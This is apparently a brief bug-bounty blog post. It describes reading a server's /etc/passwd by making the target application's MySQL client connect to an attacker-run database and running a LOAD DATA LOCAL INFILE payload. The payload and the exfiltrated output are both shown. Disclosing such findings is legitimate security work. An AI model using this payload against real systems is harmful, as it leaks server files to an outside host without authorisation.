This blog describes one of my findings on a private program. The attack vector is simple, short and elegant (at least for me).

Simplicity is the ultimate sophistication.

One day, HackerOne asked me to join a private program. OK. I decided to have a look.

After creating the test account, I was asked to fill the source info:

Image for post
Image for post
Database connection parameters are required! (The website frontend has been changed to protect their privacy)

There is a MySQL client in the application, it will connect to our own MySQL server. So, I created the new user, database, table on my server and open that port. For the SQL SELECT box, fill this payload:

LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE dadadb.dadatable FIELDS TERMINATED BY "\n"
Image for post
Image for post

Then sent the request and got the target file /etc/passwd on my server.

mysql> select * from test;
+----------------------------------------------+
| value |
+----------------------------------------------+
| root:x:0:0:root:/root:/bin/bash | | ... |
| ... |
+----------------------------------------------+

Submit the report and got the bounty.

Image for post
Image for post

If you like my sharing, please consider buying me a coffee. ☕️

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store